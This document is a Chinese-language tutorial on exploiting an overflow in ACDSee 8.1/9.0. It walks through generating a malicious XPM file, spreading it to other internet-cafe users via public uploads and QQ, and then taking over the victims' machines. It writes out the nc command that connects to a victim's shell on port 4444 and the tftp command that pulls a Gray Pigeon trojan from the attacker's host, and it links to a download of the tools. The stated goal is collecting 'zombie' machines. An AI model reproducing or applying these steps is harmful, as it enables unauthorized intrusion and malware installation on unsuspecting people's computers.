巧用ACDSee致命漏洞

　　ACDSee10以下的版本可都有个致命的漏洞噢，这次我就遇到了这种情况，这个危险的漏洞据官方报道，影响的软件是ACDSee Photo Manager 9.0和ACDSee Photo Manager 8.1。废话不多说了，看看笔者的经历吧。

　　图1 ACDSee 8.1

　　图2输入代码acdsee.exe 1 test.xpm

　　现在双击运行1.bat，就会在这个目录下面生成一个名字为test.xpm的文件了，这个XPM文件是默认被ACDSee程序关联打开的(如图3)。

　　图3生成的1.bat文件

[#page_先在本机测试看看效果#0#0#0#0#]

　　先在本机上测试一下吧，双击这个XPM文件，打开了可爱的ACDSee窗口。呀，ACDSee死住了！这就是溢出的结果了，说明我们成功了，下面只有在“任务管理器”里把ACDSee终结了。

　　下面点击“开始”→“运行”，输入“cmd”后回车，打开“命令提示符”窗口，在其中输入“netstat -an”命令来查看本机的端口开放情况，看见了吗？4444端口打开了，并且处于监听状态(如图4)。快把这个文件发到我们网吧的公共上传区里，让别人来下载吧，那我们可就摇身一变“养鸡专业户”了。

　　图4系统已经处在监听状态了

小提示：

　　这个XPM文件的传播可以依赖网吧的公共上传区，也可以用QQ的同吧功能哦！点击QQ面板左边的“同吧”按钮，就可以看到你所在的这个网吧里所有的QQ用户了(如图5)，传给他们吧。

　　图5发给QQ好友

[#page_抓一只“肉鸡”#0#0#0#0#]

等“鸡”上钩

　　玩了一会儿游戏，该有人打开了吧？试试吧。我选中一个发过去的目标，用“傻瓜化端口扫描器”小扫一下，果然4444打开着啊(如图6)，嘻嘻。然后该祭出黑客必备利器——瑞士军刀NC来连接肉鸡以实现我们的计划了。

　　图6打开对方端口

　　下载NC，将其放在一个文件夹下，如上面说的，打开“记事本”程序，在其中输入如下的代码：nc 192.168.0.151 4444 (192.168.0.151是目标肉鸡的IP地址，4444就是它打开的待接端口喽)，然后保存为一个批处理文件2.bat，和nc.exe放在同一个目录里。

　　双击运行2.bat这个文件，看见了？我们的NC顺利的连接上了肉鸡(如图7)，并且返回了一个CMDShell，现在我们在这个窗口里的操作就等同于在肉鸡上执行命令了，嘻嘻。该是上传个木马的时候了，总不能什么都在这个命令提示符里操作吧，多不方便啊。说到上传木马，黑客最常用的就是tftp上传了，但是小菜们可能还不太熟悉tftp的使用，下面我来详细操作一下。

　　图7顺利地抓到一只“肉鸡”

[#page_将木马安装到对方系统中#0#0#0#0#]

上传木马

　　首先，制作一个木马客户端，比如用灰鸽子，生成后把文件名改为muma.exe，留着备用，具体的制作过程我就不多说了，小CASE嘛！

　　然后，下载“TFTPD32”这款软件(如图8)。

　　图8 TFTPD32软件界面

　　把它和我们要上传的木马muma.exe放到同一个一个目录下(如图9),运行它之后就会自动在本机搭建一个TFTP服务器了。

　　图9将木马muma.exe放入同一个目录下

　　最后，将TFTPD32最小化，在刚刚得到的CMDShell里输入如下命令并回车确定： tftp -i 192.168.0.149 get muma.exe D:\muma.exe，就可以看到上传成功的显示了(如图10)。

　　图10显示上传成功

　　192.168.0.149是我这台电脑的IP地址，这条命令作用是把本机上的和TFTPD32在同一目录下的muma.exe上传到192.168.0.151上，并且放置到D:\下。

　　如果muma.exe不是和TFTPD32.exe放在同一目录下的话，也可以把上句中的muma.exe换成绝对路径，比如C:\windows\muma.exe，一样可以成功上传。

　　该在他的机上运行木马了，输入命令muma.exe即可，呵呵，喝杯饮料安心地等着马儿上线吧。过了一会儿，果然不出所料啊。

　　至此，一次完整的漏洞利用及入侵过程就结束了，ACDSee也可以帮助我们成为“养鸡专业户”噢！大家请到http://hi.baidu.com/biweilun/blog/item/a35993ca804f4185c91768b5.html下载所有工具。